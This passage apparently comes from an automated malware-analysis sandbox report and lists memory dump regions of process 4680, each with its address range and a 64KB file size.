
                                          64KB

                                        • memory/4680-337-0x00007FFD1BA50000-0x00007FFD1BA60000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4680-344-0x00007FFD18CB0000-0x00007FFD18CC0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4680-584-0x00007FFD1BA50000-0x00007FFD1BA60000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4680-585-0x00007FFD1BA50000-0x00007FFD1BA60000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4680-583-0x00007FFD1BA50000-0x00007FFD1BA60000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4680-582-0x00007FFD1BA50000-0x00007FFD1BA60000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4680-343-0x00007FFD18CB0000-0x00007FFD18CC0000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4680-338-0x00007FFD1BA50000-0x00007FFD1BA60000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4680-340-0x00007FFD1BA50000-0x00007FFD1BA60000-memory.dmp

                                          Filesize

                                          64KB

                                        • memory/4680-339-0x00007FFD1BA50000-0x00007FFD1BA60000-memory.dmp

                                          Filesize

                                          64KB